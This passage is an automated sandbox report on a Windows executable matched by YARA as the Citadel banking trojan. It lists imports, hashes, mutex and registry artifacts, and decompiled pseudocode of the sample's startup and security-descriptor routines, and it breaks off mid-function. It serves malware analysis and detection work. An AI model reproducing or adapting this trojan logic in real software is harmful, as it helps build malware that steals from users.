CRYPT32.dll	PFXImportCertStore, CertOpenSystemStoreW, CertCloseStore, CertEnumCertificatesInStore, CertDuplicateCertificateContext, PFXExportCertStoreEx, CertDeleteCertificateFromStore
WININET.dll	InternetCrackUrlA, HttpAddRequestHeadersW, InternetSetStatusCallbackW, GetUrlCacheEntryInfoW, InternetQueryOptionA, InternetSetOptionA, HttpSendRequestW, InternetReadFile, InternetReadFileExA, InternetQueryDataAvailable, HttpSendRequestExW, HttpSendRequestExA, InternetCloseHandle, InternetOpenA, HttpSendRequestA, HttpAddRequestHeadersA, HttpOpenRequestA, InternetConnectA, HttpQueryInfoA
OLEAUT32.dll	VariantInit, VariantClear, SysAllocString, SysFreeString
NETAPI32.dll	NetUserEnum, NetApiBufferFree, NetUserGetInfo

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

System Behavior

Analysis Process: executable.4080.exe PID: 5424 Parent PID: 5524

General

Start time:	21:51:29
Start date:	25/02/2021
Path:	C:\Users\user\Desktop\executable.4080.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\executable.4080.exe'
Imagebase:	0x400000
File size:	118784 bytes
MD5 hash:	9B6886089B69BC227E48ACCB63231096
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Citadel, Description: Yara detected Citadel, Source: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Citadel, Description: Yara detected Citadel, Source: 00000000.00000000.197550286.0000000000401000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: executable.4080.exe PID: 5424 Parent PID: 5524 executable.4080.exeCOMMON

Execution Graph

Execution Coverage:	0.7%
Dynamic/Decrypted Code Coverage:	4.5%
Signature Coverage:	15.7%
Total number of Nodes:	560
Total number of Limit Nodes:	5

Executed Functions

Function 0040779B, Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 111
memorynetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E0040779B(void* __ecx, void* __edx, void* __edi, signed char _a4) {
				char _v441;
				char _v748;
				char _v756;
				void* __esi;
				void* _t16;
				signed int _t19;
				signed int _t20;
				signed int _t21;
				void** _t22;
				void** _t24;
				signed int _t26;
				signed int _t28;
				signed int _t29;
				signed int _t31;
				long _t39;
				void* _t41;
				void* _t43;
				void* _t44;
				signed int _t47;

				_t44 = __edi;
				_t43 = __edx;
				_t41 = __ecx;
				_t47 = _a4 & 0x00000001;
				_t39 = 0;
				if(_t47 == 0) {
					 *0x4192d0 = _t39;
				}
				if(E004073D9(_t43, _a4) != 0) {
					_t16 = HeapCreate(_t39, 0x80000, _t39); // executed
					 *0x41a570 = _t16;
					__eflags = _t16 - _t39;
					if(_t16 != _t39) {
						 *0x41a569 = 1;
					} else {
						 *0x41a570 = GetProcessHeap();
						 *0x41a569 = _t39;
					}
					 *0x419ba0 = _t39;
					 *0x41a568 = _t39;
					InitializeCriticalSection(0x419188);
					 *0x4191a0 = _t39; // executed
					__imp__#115(0x202,  &_v748); // executed
					_t19 = E0040750F(_a4, _t41, _t44, _t47);
					__eflags = _t19;
					if(_t19 == 0) {
						goto L3;
					} else {
						_t21 = E00407589(_a4);
						__eflags = _t21;
						if(_t21 == 0) {
							goto L3;
						} else {
							_t22 = E0040F311(_t41, 0xffffffff, 0x4192e0);
							 *0x4192d4 = _t22;
							__eflags = _t22 - _t39;
							if(_t22 == _t39) {
								goto L3;
							} else {
								 *0x4192d8 = GetLengthSid( *_t22);
								_t24 =  *0x4192d4; // 0x201f7d0
								 *0x4192dc = E0040B855( *_t24, _t23);
								_t26 = E004075D7(_t25, _a4);
								__eflags = _t26;
								if(_t26 == 0) {
									goto L3;
								} else {
									 *0x419544 = GetCurrentProcessId();
									 *0x419548 = _t39;
									__eflags = _t47 - _t39;
									if(_t47 != _t39) {
										_t28 = 1;
									} else {
										_t28 = E00407639();
									}
									__eflags = _t28 - _t39;
									if(_t28 == _t39) {
										goto L3;
									} else {
										__eflags = _t47 - _t39;
										if(_t47 == _t39) {
											E00407B53( &_v756);
											E0040E9AF(L"{F0CFCAE1-4272-0517-A2A0-B1E71D94040E}", 0x41954c,  *0x4192dc,  &_v441, _t39);
										}
										_t29 = E0040768B(_a4);
										__eflags = _t29;
										if(_t29 == 0) {
											goto L3;
										} else {
											__eflags = _a4 & 0x00000002;
											 *0x41a580 = _t39;
											L"C:\\Users\\Jamey\\AppData\\Roaming\\Ytveig\\adyq.cik" = 0;
											L"SOFTWARE\\Microsoft\\Qodit" = 0;
											 *0x41aad8 = 0;
											L"SOFTWARE\\Microsoft\\Qodit" = 0;
											L"Global\\{66B478CA-F059-936C-A2A0-B1E71D94040E}" = 0;
											L"SOFTWARE\\Microsoft\\Qodit" = 0;
											if(__eflags == 0) {
												_t31 = 1;
											} else {
												_t31 = E00407728(_t44, __eflags);
											}
											__eflags = _t31 - _t39;
											_t14 = _t31 != _t39;
											__eflags = _t14;
											_t20 = _t31 & 0xffffff00 | _t14;
										}
									}
								}
							}
						}
					}
				} else {
					L3:
					_t20 = 0;
				}
				return _t20;
			}

0x0040779b
0x0040779b
0x0040779b
0x004077ac
0x004077b1
0x004077b2
0x004077b4
0x004077b4
0x004077c4
0x004077d4
0x004077da
0x004077df
0x004077e1
0x004077f6
0x004077e3
0x004077e9
0x004077ee
0x004077ee
0x00407802
0x00407808
0x0040780e
0x0040781e
0x00407824
0x0040782d
0x00407832
0x00407834
0x00000000
0x00407836
0x00407839
0x0040783e
0x00407840
0x00000000
0x00407842
0x00407849
0x0040784e
0x00407853
0x00407855
0x00000000
0x0040785b
0x00407863
0x00407869
0x00407878
0x0040787d
0x00407882
0x00407884
0x00000000
0x0040788a
0x00407890
0x00407895
0x0040789b
0x0040789d
0x004078a6
0x0040789f
0x0040789f
0x0040789f
0x004078a8
0x004078aa
0x00000000
0x004078b0
0x004078b0
0x004078b2
0x004078b8
0x004078db
0x004078db
0x004078e3
0x004078e8
0x004078ea
0x00000000
0x004078f0
0x004078f2
0x004078f6
0x004078fc
0x00407902
0x00407908
0x0040790e
0x00407914
0x0040791a
0x00407920
0x00407929
0x00407922
0x00407922
0x00407922
0x0040792b
0x0040792d
0x0040792d
0x0040792d
0x0040792d
0x004078ea
0x004078aa
0x00407884
0x00407855
0x00407840
0x004077c6
0x004077c6
0x004077c6
0x004077c6
0x00407935

APIs

HeapCreate.KERNELBASE(00000000,00080000,00000000,00000000,?,00000000), ref: 004077D4
GetProcessHeap.KERNEL32(?,00000000), ref: 004077E3
InitializeCriticalSection.KERNEL32(00419188,?,00000000), ref: 0040780E
WSAStartup.WS2_32(00000202,?), ref: 00407824
GetLengthSid.ADVAPI32(00000000,000000FF,004192E0,00000000,?,00000000), ref: 0040785D
GetCurrentProcessId.KERNEL32(00000000,0201F7D0,00000000,?,00000000), ref: 0040788A

Strings

SOFTWARE\Microsoft\Qodit, xrefs: 0040791A
C:\Users\Jamey\AppData\Roaming\Ytveig\adyq.cik, xrefs: 004078FC
Global\{66B478CA-F059-936C-A2A0-B1E71D94040E}, xrefs: 00407914
SOFTWARE\Microsoft\Qodit, xrefs: 00407902
SOFTWARE\Microsoft\Qodit, xrefs: 0040790E
{F0CFCAE1-4272-0517-A2A0-B1E71D94040E}, xrefs: 004078CC

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: HeapProcess$CreateCriticalCurrentInitializeLengthSectionStartup
String ID: C:\Users\Jamey\AppData\Roaming\Ytveig\adyq.cik$Global\{66B478CA-F059-936C-A2A0-B1E71D94040E}$SOFTWARE\Microsoft\Qodit$SOFTWARE\Microsoft\Qodit$SOFTWARE\Microsoft\Qodit${F0CFCAE1-4272-0517-A2A0-B1E71D94040E}
API String ID: 2528102454-1264117554
Opcode ID: 2aadc0eb9814a50c60d7bd768e57fd36b68328fba7501129c4850c3bd16490ec
Instruction ID: e472fa0b51f4d27c8a70246af906feb6cb263db6039360773b08a0fcf8211e10
Opcode Fuzzy Hash: 2aadc0eb9814a50c60d7bd768e57fd36b68328fba7501129c4850c3bd16490ec
Instruction Fuzzy Hash: 4841EF70808240BECB11AF64EC85AD93BA5AB04398B04857BE948F72F1E7396C91D71F

Uniqueness

Uniqueness Score: -1.00%

Function 0040DB47, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 56
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E0040DB47(struct _SECURITY_DESCRIPTOR* __edi, intOrPtr* __esi) {
				struct _ACL* _v8;
				struct _SECURITY_DESCRIPTOR* _v12;
				int _v16;
				int _v20;
				void** _t16;
				struct _SECURITY_DESCRIPTOR* _t25;
				intOrPtr* _t26;

				_t26 = __esi;
				_t25 = __edi;
				if(InitializeSecurityDescriptor(__edi, 1) == 0 || SetSecurityDescriptorDacl(__edi, 1, 0, 0) == 0) {
					return 0;
				} else {
					_push(0);
					_t16 =  &_v12;
					_push(_t16);
					_push(1);
					_push(L"S:(ML;;NRNWNX;;;LW)"); // executed
					L00415950(); // executed
					if(_t16 != 0) {
						_v8 = 0;
						if(GetSecurityDescriptorSacl(_v12,  &_v20,  &_v8,  &_v16) == 0 || SetSecurityDescriptorSacl(__edi, _v20, _v8, _v16) == 0) {
							LocalFree(_v12);
						}
					}
					if(_t26 != 0) {
						 *_t26 = 0xc;
						 *(_t26 + 4) = _t25;
						 *((intOrPtr*)(_t26 + 8)) = 0;
					}
					return 1;
				}
			}

0x0040db47
0x0040db47
0x0040db59
0x00000000
0x0040db6c
0x0040db6c
0x0040db6d
0x0040db70
0x0040db71
0x0040db73
0x0040db78
0x0040db7f
0x0040db90
0x0040db9b
0x0040dbb4
0x0040dbb4
0x0040db9b
0x0040dbbc
0x0040dbbe
0x0040dbc4
0x0040dbc7
0x0040dbc7
0x00000000
0x0040dbca

APIs

InitializeSecurityDescriptor.ADVAPI32(00419318,00000001,00000000,00000000,00407832,?,00000000), ref: 0040DB51
SetSecurityDescriptorDacl.ADVAPI32(00419318,00000001,00000000,00000000,?,00000000), ref: 0040DB62
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 0040DB78
GetSecurityDescriptorSacl.ADVAPI32(?,00000000,00000000,?,?,00000000), ref: 0040DB93
SetSecurityDescriptorSacl.ADVAPI32(00419318,00000000,00000000,?,?,00000000), ref: 0040DBA7
LocalFree.KERNEL32(?,?,00000000), ref: 0040DBB4

Strings

S:(ML;;NRNWNX;;;LW), xrefs: 0040DB73

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: DescriptorSecurity$Sacl$ConvertDaclFreeInitializeLocalString
String ID: S:(ML;;NRNWNX;;;LW)
API String ID: 2050860296-820036962
Opcode ID: 01d9340cc45710f5766464196f2030191e88dcccf6cdd7b37e5e192805b1d4d2
Instruction ID: b6c36742903de2a9131d8955831316b6987f175f24bb6198c5f2eea010f3ba00
Opcode Fuzzy Hash: 01d9340cc45710f5766464196f2030191e88dcccf6cdd7b37e5e192805b1d4d2
Instruction Fuzzy Hash: 8E113C75900209FAEF119FE18D85EAFBBBDAF00740F10447AF552B11A0E7B59A449A28

Uniqueness

Uniqueness Score: -1.00%

Function 00407F7F, Relevance: 47.5, APIs: 25, Strings: 2, Instructions: 276
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			_entry_(signed int __ecx, void* __edx, void* __edi, void* __eflags) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t75;
				void* _t81;
				void* _t83;
				void* _t84;
				void* _t85;
				void* _t90;
				intOrPtr* _t91;
				void* _t93;
				void* _t95;
				void* _t99;
				void* _t103;
				int _t111;
				int _t120;
				signed int _t152;
				void* _t155;
				void* _t160;
				void* _t162;

				_t153 = __edi;
				_t146 = __ecx;
				_t160 = _t162 - 0x78;
				 *(_t160 + 0x77) = 0;
				_t75 = E0040779B(__ecx, __edx, __edi, 0); // executed
				if(_t75 == 0) {
					L50:
					__eflags =  *(_t160 + 0x77);
					_t74 =  *(_t160 + 0x77) == 0;
					__eflags = _t74;
					ExitProcess(0 | _t74);
				}
				 *((char*)(_t160 + 0x5c)) = 0;
				 *((char*)(_t160 + 0x76)) = 1;
				SetErrorMode(0x8007);
				_t81 = CommandLineToArgvW(GetCommandLineW(), _t160 + 0x6c);
				if(_t81 == 0) {
					L11:
					_push(_t153);
					_t157 = _t160 + 0x60;
					_t83 = E0040B046(0, _t146, _t160 + 0x60,  *0x41932c);
					_t174 = _t83;
					if(_t83 != 0) {
						_t146 =  *(_t160 + 0x60);
						E00407D04( *(_t160 + 0x64),  *(_t160 + 0x60), _t174, _t160 + 0x6c, _t160 + 0x70);
						E0040B0EE(_t157);
					}
					if( *(_t160 + 0x70) != 0x1e6) {
						__eflags =  *(_t160 + 0x70) - 0xc;
						if( *(_t160 + 0x70) != 0xc) {
							L47:
							_t84 = E004097F7( *(_t160 + 0x6c));
							if( *(_t160 + 0x77) == 0 || ( *0x4192d0 & 0x00000002) == 0) {
								goto L50;
							} else {
								Sleep(0xffffffff);
								return _t84;
							}
						}
						_t85 = E00407A11(_t146, 0x8789347b, 2);
						 *(_t160 + 0x70) = _t85;
						__eflags = _t85;
						if(_t85 == 0) {
							L45:
							__eflags =  *((char*)(_t160 + 0x76)) - 1;
							if( *((char*)(_t160 + 0x76)) == 1) {
								E0040EA63(0, _t153, _t157,  *0x41932c);
							}
							goto L47;
						}
						E004079D9(0x19367400, _t160 - 0x18, 1);
						_t90 = OpenMutexW(0x100000, 0, _t160 - 0x18);
						_t157 = GetFileAttributesExW;
						_t153 = ReadProcessMemory;
						__eflags = _t90;
						if(_t90 == 0) {
							L29:
							_t91 =  *0x4192d4; // 0x201f7d0
							__imp__IsWellKnownSid( *_t91, 0x16);
							__eflags = _t91 - 1;
							if(_t91 != 1) {
								 *(_t160 + 0x77) = 0;
								_t93 = ReadProcessMemory(0xffffffff, _t157, _t160 + 0x77, 1, 0);
								__eflags = _t93;
								if(_t93 == 0) {
									L35:
									_push( *( *(_t160 + 0x6c)));
									_t153 = L004085F2;
									_t95 = E00410C3B(_t146, L004085F2,  *((intOrPtr*)( *(_t160 + 0x6c) + 4)));
									_t157 = L"C:\\Users\\Jamey\\AppData\\Roaming";
									 *(_t160 + 0x77) = L004085F2(_t95, 0, L"C:\\Users\\Jamey\\AppData\\Roaming", _t160 - 0x220, L004085F2, L"C:\\Users\\Jamey\\AppData\\Roaming");
									L36:
									__eflags =  *(_t160 + 0x77) - 1;
									if( *(_t160 + 0x77) == 1) {
										_t99 = E0040F5C2(_t160 - 0x220, 0, _t157, 0, _t160 + 0x4c);
										__eflags = _t99;
										 *(_t160 + 0x77) = _t99 != 0;
										__eflags =  *(_t160 + 0x77);
										if( *(_t160 + 0x77) != 0) {
											E004079D9(0x2a43533f, _t160 - 0x18, 1);
											_t103 = CreateEventW(0x41930c, 1, 0, _t160 - 0x18);
											_t157 =  *(_t160 + 0x4c);
											 *(_t160 + 0x64) = _t103;
											 *(_t160 + 0x68) = _t157;
											_push(0xffffffff);
											__eflags = _t103;
											if(_t103 != 0) {
												WaitForMultipleObjects(2, _t160 + 0x64, 0, ??);
											} else {
												WaitForSingleObject(_t157, ??);
											}
											__eflags =  *(_t160 + 0x64);
											if( *(_t160 + 0x64) != 0) {
												CloseHandle( *(_t160 + 0x64));
											}
											_t153 = CloseHandle;
											CloseHandle( *(_t160 + 0x50));
											CloseHandle(_t157);
										}
									}
									L44:
									E0040DD1D( *(_t160 + 0x70));
									goto L45;
								}
								__eflags =  *(_t160 + 0x77) - 0xe9;
								if( *(_t160 + 0x77) != 0xe9) {
									goto L35;
								}
								_t111 = GetFileAttributesExW(L"{F0CFCAE1-4272-0517-A2A0-B1E71D94040E}", 0x78f16360, _t160 + 0x68);
								__eflags = _t111 - 1;
								if(_t111 != 1) {
									goto L35;
								}
								_push( *( *(_t160 + 0x6c)));
								_t153 = L0040895A;
								E00410C3B(_t146, L0040895A,  *((intOrPtr*)( *(_t160 + 0x6c) + 8)));
								_push( *((intOrPtr*)(_t160 + 0x5c)));
								_t157 = L"C:\\Users\\Jamey\\AppData\\Roaming";
								_push(_t160 - 0x220);
								 *(_t160 + 0x77) = L0040895A(_t160 - 0x220, 0,  *(_t160 + 0x68), L"C:\\Users\\Jamey\\AppData\\Roaming", __eflags);
								VirtualFree( *(_t160 + 0x68), 0, 0x8000);
								goto L36;
							}
							 *(_t160 + 0x77) = E00408C33();
							goto L44;
						}
						CloseHandle(_t90);
						while(1) {
							 *(_t160 + 0x77) = 0;
							_t120 = ReadProcessMemory(0xffffffff, _t157, _t160 + 0x77, 1, 0);
							__eflags = _t120;
							if(_t120 == 0) {
								goto L28;
							}
							__eflags =  *(_t160 + 0x77) - 0xe9;
							if( *(_t160 + 0x77) == 0xe9) {
								goto L29;
							}
							L28:
							Sleep(0x1f4);
						}
					}
					if(E004088A3(_t146,  *(_t160 + 0x6c)) != 0) {
						E004079D9(0x38901130, _t160 - 0x18, 1);
						if(CreateMutexW(0x41930c, 1, _t160 - 0x18) == 0) {
							 *(_t160 + 0x70) = 0;
						} else {
							 *(_t160 + 0x70) = E0040DD2D(_t125);
						}
						if( *(_t160 + 0x70) != 0) {
							E00413BF3();
							E004079D9(0x2a43533f, _t160 - 0x18, 1);
							_t155 = OpenEventW(2, 0, _t160 - 0x18);
							if(_t155 != 0) {
								SetEvent(_t155);
								CloseHandle(_t155);
							}
							E00407DDA(1);
							 *(_t160 + 0x77) = 1;
							CloseHandle( *(_t160 + 0x70));
						}
					}
					goto L47;
				}
				_t152 = 0;
				if( *(_t160 + 0x6c) <= 0) {
					L10:
					LocalFree(_t81);
					goto L11;
				} else {
					goto L3;
				}
				do {
					L3:
					_t146 =  *(_t81 + _t152 * 4);
					if(_t146 != 0 &&  *_t146 == 0x2d) {
						_t146 =  *(_t146 + 2) & 0x0000ffff;
						if(_t146 == 0x66) {
							 *((char*)(_t160 + 0x5c)) = 1;
						} else {
							if(_t146 == 0x6e) {
								 *((char*)(_t160 + 0x76)) = 0;
							}
						}
					}
					_t152 = _t152 + 1;
				} while (_t152 <  *(_t160 + 0x6c));
				goto L10;
			}

0x00407f7f
0x00407f7f
0x00407f80
0x00407f8e
0x00407f91
0x00407f98
0x004082cf
0x004082d1
0x004082d4
0x004082d4
0x004082d8
0x004082d8
0x00407fa3
0x00407fa6
0x00407faa
0x00407fbb
0x00407fc3
0x00407ffd
0x00407ffe
0x00408007
0x0040800a
0x0040800f
0x00408011
0x00408013
0x00408021
0x00408028
0x00408028
0x00408034
0x004080d2
0x004080d6
0x004082a9
0x004082ac
0x004082b6
0x00000000
0x004082c1
0x004082c3
0x004082ce
0x004082ce
0x004082b6
0x004080e3
0x004080e8
0x004080eb
0x004080ed
0x00408298
0x00408298
0x0040829c
0x004082a4
0x004082a4
0x00000000
0x0040829c
0x004080fe
0x0040810d
0x00408113
0x00408119
0x0040811f
0x00408121
0x00408150
0x00408150
0x00408159
0x0040815f
0x00408162
0x0040817b
0x0040817e
0x00408180
0x00408182
0x004081de
0x004081e1
0x004081e3
0x004081eb
0x004081f0
0x00408202
0x00408205
0x00408205
0x00408209
0x0040821d
0x00408222
0x00408224
0x00408228
0x0040822b
0x00408238
0x00408249
0x0040824f
0x00408252
0x00408255
0x00408258
0x0040825a
0x0040825c
0x0040826e
0x0040825e
0x0040825f
0x0040825f
0x00408274
0x00408277
0x0040827c
0x0040827c
0x00408285
0x0040828b
0x0040828e
0x0040828e
0x0040822b
0x00408290
0x00408293
0x00000000
0x00408293
0x00408184
0x00408188
0x00000000
0x00000000
0x00408198
0x0040819a
0x0040819d
0x00000000
0x00000000
0x004081a2
0x004081a4
0x004081ac
0x004081b1
0x004081bd
0x004081c2
0x004081d3
0x004081d6
0x00000000
0x004081d6
0x00408169
0x00000000
0x00408169
0x00408124
0x0040812a
0x00408134
0x00408137
0x00408139
0x0040813b
0x00000000
0x00000000
0x0040813d
0x00408141
0x00000000
0x00000000
0x00408143
0x00408148
0x00408148
0x0040812a
0x00408044
0x00408055
0x0040806d
0x00408079
0x0040806f
0x00408074
0x00408074
0x0040807f
0x00408085
0x00408095
0x004080ad
0x004080b1
0x004080b4
0x004080bb
0x004080bb
0x004080bf
0x004080c7
0x004080cb
0x004080cb
0x0040807f
0x00000000
0x00408044
0x00407fc5
0x00407fca
0x00407ff6
0x00407ff7
0x00000000
0x00000000
0x00000000
0x00000000
0x00407fcc
0x00407fcc
0x00407fcc
0x00407fd1
0x00407fd9
0x00407fe0
0x00407fec
0x00407fe2
0x00407fe5
0x00407fe7
0x00407fe7
0x00407fe5
0x00407fe0
0x00407ff0
0x00407ff1
0x00000000

APIs

SetErrorMode.KERNEL32(00008007,00000000), ref: 00407FAA
GetCommandLineW.KERNEL32(?), ref: 00407FB4
CommandLineToArgvW.SHELL32(00000000), ref: 00407FBB
LocalFree.KERNEL32(00000000), ref: 00407FF7
CreateMutexW.KERNEL32(0041930C,00000001,?,38901130,?,00000001,?), ref: 00408065
OpenEventW.KERNEL32(00000002,00000000,?,2A43533F,?,00000001), ref: 004080A1
SetEvent.KERNEL32(00000000), ref: 004080B4
CloseHandle.KERNEL32(00000000), ref: 004080BB
CloseHandle.KERNEL32(?,00000001), ref: 004080CB
OpenMutexW.KERNEL32(00100000,00000000,?,19367400,?,00000001,8789347B,00000002), ref: 0040810D
CloseHandle.KERNEL32(00000000), ref: 00408124
ReadProcessMemory.KERNEL32(000000FF,74B5F9B0,?,00000001,00000000), ref: 00408137
Sleep.KERNEL32(000001F4), ref: 00408148
IsWellKnownSid.ADVAPI32(0201F7D0,00000016), ref: 00408159
ReadProcessMemory.KERNEL32(000000FF,74B5F9B0,?,00000001,00000000), ref: 0040817E
GetFileAttributesExW.KERNEL32({F0CFCAE1-4272-0517-A2A0-B1E71D94040E},78F16360,?), ref: 00408198
VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?), ref: 004081D6
CreateEventW.KERNEL32(0041930C,00000001,00000000,?,2A43533F,?,00000001,?,?,00000000,C:\Users\Jamey\AppData\Roaming,00000000,?,?,?), ref: 00408249
WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040825F
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0040826E
CloseHandle.KERNEL32(?), ref: 0040827C
CloseHandle.KERNEL32(?), ref: 0040828B
CloseHandle.KERNEL32(?), ref: 0040828E
Sleep.KERNEL32(000000FF), ref: 004082C3
ExitProcess.KERNEL32 ref: 004082D8

Strings

{F0CFCAE1-4272-0517-A2A0-B1E71D94040E}, xrefs: 00408193
C:\Users\Jamey\AppData\Roaming, xrefs: 004081BD, 004081F0, 00408214

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: CloseHandle$EventProcess$CommandCreateFreeLineMemoryMutexOpenReadSleepWait$ArgvAttributesErrorExitFileKnownLocalModeMultipleObjectObjectsSingleVirtualWell
String ID: C:\Users\Jamey\AppData\Roaming${F0CFCAE1-4272-0517-A2A0-B1E71D94040E}
API String ID: 739993762-2180284786
Opcode ID: 9b0f315999aba71745f81306310f641b9d9c67a93e3f66e7ae6530fe6061d80a
Instruction ID: 7a98628b8e0f37e50ff5711c1732d73829a2b38de0a3c91ac5a033fc6744bbb5
Opcode Fuzzy Hash: 9b0f315999aba71745f81306310f641b9d9c67a93e3f66e7ae6530fe6061d80a
Instruction Fuzzy Hash: 5DA1A37140424CAFDF20AFA0CD45AEE3BA9AF05304F14407EFA65B61E2CB389C45CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040E8FE, Relevance: 10.6, APIs: 7, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 32%

			E0040E8FE() {
				void* _t21;
				void* _t29;
				void* _t30;
				void* _t31;
				void* _t34;
				intOrPtr* _t36;
				void* _t37;
				void* _t40;
				void* _t42;

				_t40 = _t42 - 0x74;
				_t31 = 0; // executed
				__imp__SHGetFolderPathW(0, 0x24, 0, 0, _t40 - 0x25c, _t34, _t37, _t30); // executed
				if(0 != 0) {
					L8:
					E00409898( *((intOrPtr*)(_t40 + 0x7c)), 0x10);
				} else {
					PathAddBackslashW(_t40 - 0x25c);
					_t36 = __imp__GetVolumeNameForVolumeMountPointW;
					while(1) {
						_t21 =  *_t36(_t40 - 0x25c, _t40 - 0x54, 0x64); // executed
						if(_t21 != 0) {
							break;
						}
						PathRemoveBackslashW(_t40 - 0x25c);
						if(PathRemoveFileSpecW(_t40 - 0x25c) == 0) {
							goto L8;
						} else {
							PathAddBackslashW(_t40 - 0x25c);
							continue;
						}
						goto L9;
					}
					if( *((short*)(_t40 - 0x40)) != 0x7b) {
						goto L8;
					} else {
						 *((short*)(_t40 + 0xc)) = 0;
						_t29 = _t40 - 0x40;
						__imp__CLSIDFromString(_t29,  *((intOrPtr*)(_t40 + 0x7c)));
						if(_t29 != 0) {
							goto L8;
						} else {
							_t31 = 1;
						}
					}
				}
				L9:
				return _t31;
			}

0x0040e8ff
0x0040e91a
0x0040e91c
0x0040e924
0x0040e999
0x0040e99e
0x0040e926
0x0040e933
0x0040e935
0x0040e964
0x0040e971
0x0040e975
0x00000000
0x00000000
0x0040e944
0x0040e959
0x00000000
0x0040e95b
0x0040e962
0x00000000
0x0040e962
0x00000000
0x0040e959
0x0040e97c
0x00000000
0x0040e97e
0x0040e983
0x0040e987
0x0040e98b
0x0040e993
0x00000000
0x0040e995
0x0040e995
0x0040e995
0x0040e993
0x0040e97c
0x0040e9a3
0x0040e9ac

APIs

SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,?,00000000,00000000), ref: 0040E91C
PathAddBackslashW.SHLWAPI(?,?,00000000,00000000), ref: 0040E933
PathRemoveBackslashW.SHLWAPI(?,?,00000000,00000000), ref: 0040E944
PathRemoveFileSpecW.SHLWAPI(?,?,00000000,00000000), ref: 0040E951
PathAddBackslashW.SHLWAPI(?,?,00000000,00000000), ref: 0040E962
GetVolumeNameForVolumeMountPointW.KERNELBASE(?,?,00000064,?,00000000,00000000), ref: 0040E971
CLSIDFromString.OLE32(?,?,?,00000000,00000000), ref: 0040E98B

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: Path$Backslash$RemoveVolume$FileFolderFromMountNamePointSpecString
String ID:
API String ID: 613918483-0
Opcode ID: 1c684ae22dd1a15f28b70c8a71950f99228b951abd413f9284cdc6286ba94ad7
Instruction ID: 1122e30d96f58a50b627d60d82b2c9d09932d48efdd782f702a96aa87a7cd282
Opcode Fuzzy Hash: 1c684ae22dd1a15f28b70c8a71950f99228b951abd413f9284cdc6286ba94ad7
Instruction Fuzzy Hash: B21151B15012199EDB20DBB2DD48EDB77BCAB44301F10487BA615F3150E638DA188B68

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00411408, Relevance: 82.6, APIs: 27, Strings: 20, Instructions: 393
libraryloaderwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 39%

			E00411408(WCHAR* _a4, char _a8, signed short _a12) {
				struct HINSTANCE__* _v12;
				struct HINSTANCE__* _v16;
				struct HINSTANCE__* _v20;
				_Unknown_base(*)()* _v24;
				void* _v28;
				void* _v32;
				struct HDC__* _v36;
				_Unknown_base(*)()* _v40;
				_Unknown_base(*)()* _v44;
				struct tagPOINT _v52;
				_Unknown_base(*)()* _v56;
				struct HINSTANCE__* _v60;
				_Unknown_base(*)()* _v64;
				_Unknown_base(*)()* _v68;
				_Unknown_base(*)()* _v72;
				_Unknown_base(*)()* _v76;
				_Unknown_base(*)()* _v80;
				_Unknown_base(*)()* _v84;
				_Unknown_base(*)()* _v88;
				struct HINSTANCE__* _v92;
				struct HINSTANCE__* _v96;
				struct HINSTANCE__* _v100;
				char _v104;
				_Unknown_base(*)()* _v108;
				intOrPtr _v112;
